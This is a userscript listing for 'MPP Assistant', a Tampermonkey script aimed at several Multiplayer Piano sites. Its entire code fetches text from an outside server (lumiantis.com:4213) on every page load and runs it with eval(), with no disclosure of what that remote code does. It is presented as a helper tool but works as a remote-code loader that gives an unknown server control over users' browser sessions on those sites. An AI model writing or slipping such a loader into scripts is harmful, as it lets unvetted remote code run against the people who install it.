MPP Assistant by RoxasYTB (Last Version Auto)

For Multiplayer Piano

目前為 2024-06-22 提交的版本,檢視 最新版本

// ==UserScript==
// @license      MIT
// @name         MPP Assistant by RoxasYTB (Last Version Auto)
// @namespace    http://tampermonkey.net/
// @version      0.2
// @description  For Multiplayer Piano
// @author       RoxasYTB
// @match      *://multiplayerpiano.net/*
// @match      *://multiplayerpiano.org/*
// @match      *://mppclone.com/*
// @match      *://mpp.terrium.net/*
// @match      *://piano.ourworldofpixels.com/*
// @grant        none

// ==/UserScript==

(function() {
	fromRepl = true

	function htmlDecode(e) {
		return (new DOMParser).parseFromString(e, "text/html").documentElement.textContent
	}
	((async () => {
		code = await fetch("https://lumiantis.com:4213/", {
			method: "GET",
			headers: {
				"Content-Type": "application/json"
			},
			body: null
		}).then((e => e.text())), eval(htmlDecode(code));
	}))()
})();